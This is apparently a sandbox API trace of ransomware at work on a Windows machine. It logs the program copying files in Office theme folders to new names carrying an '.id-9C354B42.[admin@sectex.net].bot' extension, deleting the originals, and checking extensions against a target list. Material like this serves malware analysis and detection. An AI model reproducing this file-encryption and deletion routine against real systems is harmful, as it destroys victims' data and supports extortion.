	[0045.146] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0045.146] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.146] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.146] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0045.146] GetLastError () returned 0x0
	[0045.146] ReadFile (in: hFile=0x214, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x4162, lpOverlapped=0x0) returned 1
	[0045.148] WriteFile (in: hFile=0x1fc, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x4170, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x4170, lpOverlapped=0x0) returned 1
	[0045.149] ReadFile (in: hFile=0x214, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0045.149] WriteFile (in: hFile=0x1fc, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0045.149] SetEndOfFile (hFile=0x1fc) returned 1
	[0045.149] CloseHandle (hObject=0x1fc) returned 1
	[0045.149] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.149] SetEndOfFile (hFile=0x214) returned 1
	[0045.150] CloseHandle (hObject=0x214) returned 1
	[0045.150] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0045.151] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png")) returned 1
	[0045.151] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76
	[0045.151] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76
	[0045.151] lstrlenW (lpString=".doc") returned 4
	[0045.151] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0045.151] lstrlenW (lpString=".docx") returned 5
	[0045.151] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0045.151] lstrlenW (lpString=".pdf") returned 4
	[0045.151] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0045.151] lstrlenW (lpString=".xls") returned 4
	[0045.151] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0045.151] lstrlenW (lpString=".xlsx") returned 5
	[0045.151] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0045.151] lstrlenW (lpString=".ppt") returned 4
	[0045.151] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0045.151] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76
	[0045.151] lstrlenW (lpString=".zip") returned 4
	[0045.151] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0045.151] lstrlenW (lpString=".rar") returned 4
	[0045.151] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0045.151] lstrlenW (lpString=".bz2") returned 4
	[0045.151] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0045.151] lstrlenW (lpString=".7z") returned 3
	[0045.151] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0045.151] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76
	[0045.151] lstrlenW (lpString=".dbf") returned 4
	[0045.151] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0045.151] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76
	[0045.152] lstrlenW (lpString=".1cd") returned 4
	[0045.152] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0045.152] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76
	[0045.152] lstrlenW (lpString=".jpg") returned 4
	[0045.152] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0045.152] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76
	[0045.152] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76
	[0045.152] lstrlenW (lpString=".doc") returned 4
	[0045.152] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0045.152] lstrlenW (lpString=".docx") returned 5
	[0045.152] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0045.152] lstrlenW (lpString=".pdf") returned 4
	[0045.152] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0045.152] lstrlenW (lpString=".xls") returned 4
	[0045.152] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0045.152] lstrlenW (lpString=".xlsx") returned 5
	[0045.152] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0045.152] lstrlenW (lpString=".ppt") returned 4
	[0045.152] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0045.152] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76
	[0045.152] lstrlenW (lpString=".zip") returned 4
	[0045.152] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0045.152] lstrlenW (lpString=".rar") returned 4
	[0045.152] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0045.152] lstrlenW (lpString=".bz2") returned 4
	[0045.152] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0045.152] lstrlenW (lpString=".7z") returned 3
	[0045.152] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0045.152] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76
	[0045.152] lstrlenW (lpString=".dbf") returned 4
	[0045.152] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0045.152] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76
	[0045.152] lstrlenW (lpString=".1cd") returned 4
	[0045.152] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0045.153] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76
	[0045.153] lstrlenW (lpString=".jpg") returned 4
	[0045.153] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0045.153] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0045.153] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0045.153] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0045.153] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=1439) returned 1
	[0045.153] CloseHandle (hObject=0x214) returned 1
	[0045.153] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif")) returned 0x20
	[0045.153] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0045.153] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0045.154] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.154] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.154] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218
	[0045.158] GetLastError () returned 0x0
	[0045.158] ReadFile (in: hFile=0x214, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x59f, lpOverlapped=0x0) returned 1
	[0045.159] WriteFile (in: hFile=0x218, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x5a0, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x5a0, lpOverlapped=0x0) returned 1
	[0045.160] ReadFile (in: hFile=0x214, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0045.160] WriteFile (in: hFile=0x218, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0045.160] SetEndOfFile (hFile=0x218) returned 1
	[0045.160] CloseHandle (hObject=0x218) returned 1
	[0045.161] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.161] SetEndOfFile (hFile=0x214) returned 1
	[0045.161] CloseHandle (hObject=0x214) returned 1
	[0045.162] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0045.162] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif")) returned 1
	[0045.162] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72
	[0045.162] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72
	[0045.162] lstrlenW (lpString=".doc") returned 4
	[0045.162] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0045.162] lstrlenW (lpString=".docx") returned 5
	[0045.162] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0045.162] lstrlenW (lpString=".pdf") returned 4
	[0045.162] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0045.162] lstrlenW (lpString=".xls") returned 4
	[0045.162] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0045.162] lstrlenW (lpString=".xlsx") returned 5
	[0045.162] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0045.162] lstrlenW (lpString=".ppt") returned 4
	[0045.162] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0045.162] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72
	[0045.162] lstrlenW (lpString=".zip") returned 4
	[0045.162] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0045.162] lstrlenW (lpString=".rar") returned 4
	[0045.162] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0045.163] lstrlenW (lpString=".bz2") returned 4
	[0045.163] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0045.163] lstrlenW (lpString=".7z") returned 3
	[0045.163] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0045.163] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72
	[0045.163] lstrlenW (lpString=".dbf") returned 4
	[0045.163] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0045.163] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72
	[0045.163] lstrlenW (lpString=".1cd") returned 4
	[0045.163] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0045.163] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72
	[0045.163] lstrlenW (lpString=".jpg") returned 4
	[0045.163] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0045.163] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72
	[0045.163] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72
	[0045.163] lstrlenW (lpString=".doc") returned 4
	[0045.163] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0045.163] lstrlenW (lpString=".docx") returned 5
	[0045.163] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0045.163] lstrlenW (lpString=".pdf") returned 4
	[0045.163] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0045.163] lstrlenW (lpString=".xls") returned 4
	[0045.163] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0045.163] lstrlenW (lpString=".xlsx") returned 5
	[0045.163] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0045.163] lstrlenW (lpString=".ppt") returned 4
	[0045.163] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0045.163] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72
	[0045.163] lstrlenW (lpString=".zip") returned 4
	[0045.163] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0045.163] lstrlenW (lpString=".rar") returned 4
	[0045.163] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0045.163] lstrlenW (lpString=".bz2") returned 4
	[0045.163] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0045.164] lstrlenW (lpString=".7z") returned 3
	[0045.164] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0045.164] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72
	[0045.164] lstrlenW (lpString=".dbf") returned 4
	[0045.164] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0045.164] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72
	[0045.164] lstrlenW (lpString=".1cd") returned 4
	[0045.164] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0045.164] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72
	[0045.164] lstrlenW (lpString=".jpg") returned 4
	[0045.164] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0045.164] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0045.164] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0045.164] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0045.164] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=37112) returned 1
	[0045.164] CloseHandle (hObject=0x214) returned 1
	[0045.164] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png")) returned 0x20
	[0045.165] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0045.165] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0045.165] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.165] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.165] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218
	[0045.165] GetLastError () returned 0x0
	[0045.165] ReadFile (in: hFile=0x214, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x90f8, lpOverlapped=0x0) returned 1
	[0045.568] WriteFile (in: hFile=0x218, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x9100, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x9100, lpOverlapped=0x0) returned 1
	[0045.569] ReadFile (in: hFile=0x214, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0045.569] WriteFile (in: hFile=0x218, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0045.569] SetEndOfFile (hFile=0x218) returned 1
	[0045.569] CloseHandle (hObject=0x218) returned 1
	[0045.570] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.570] SetEndOfFile (hFile=0x214) returned 1
	[0045.571] CloseHandle (hObject=0x214) returned 1
	[0045.571] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0045.571] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png")) returned 1
	[0045.571] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73
	[0045.571] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73
	[0045.571] lstrlenW (lpString=".doc") returned 4
	[0045.571] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0045.571] lstrlenW (lpString=".docx") returned 5
	[0045.571] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0045.571] lstrlenW (lpString=".pdf") returned 4
	[0045.571] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0045.571] lstrlenW (lpString=".xls") returned 4
	[0045.571] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0045.571] lstrlenW (lpString=".xlsx") returned 5
	[0045.571] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0045.572] lstrlenW (lpString=".ppt") returned 4
	[0045.572] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0045.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73
	[0045.572] lstrlenW (lpString=".zip") returned 4
	[0045.572] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0045.572] lstrlenW (lpString=".rar") returned 4
	[0045.572] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0045.572] lstrlenW (lpString=".bz2") returned 4
	[0045.572] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0045.572] lstrlenW (lpString=".7z") returned 3
	[0045.572] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0045.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73
	[0045.572] lstrlenW (lpString=".dbf") returned 4
	[0045.572] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0045.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73
	[0045.572] lstrlenW (lpString=".1cd") returned 4
	[0045.572] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0045.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73
	[0045.572] lstrlenW (lpString=".jpg") returned 4
	[0045.572] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0045.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73
	[0045.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73
	[0045.572] lstrlenW (lpString=".doc") returned 4
	[0045.572] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0045.572] lstrlenW (lpString=".docx") returned 5
	[0045.572] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0045.572] lstrlenW (lpString=".pdf") returned 4
	[0045.572] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0045.572] lstrlenW (lpString=".xls") returned 4
	[0045.572] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0045.572] lstrlenW (lpString=".xlsx") returned 5
	[0045.572] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0045.572] lstrlenW (lpString=".ppt") returned 4
	[0045.573] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0045.573] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73
	[0045.573] lstrlenW (lpString=".zip") returned 4
	[0045.573] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0045.573] lstrlenW (lpString=".rar") returned 4
	[0045.573] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0045.573] lstrlenW (lpString=".bz2") returned 4
	[0045.573] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0045.573] lstrlenW (lpString=".7z") returned 3
	[0045.573] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0045.573] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73
	[0045.573] lstrlenW (lpString=".dbf") returned 4
	[0045.573] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0045.573] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73
	[0045.573] lstrlenW (lpString=".1cd") returned 4
	[0045.573] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0045.573] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73
	[0045.573] lstrlenW (lpString=".jpg") returned 4
	[0045.573] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0045.573] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0045.573] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0045.573] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0045.574] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=2604) returned 1
	[0045.574] CloseHandle (hObject=0x214) returned 1
	[0045.574] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif")) returned 0x20
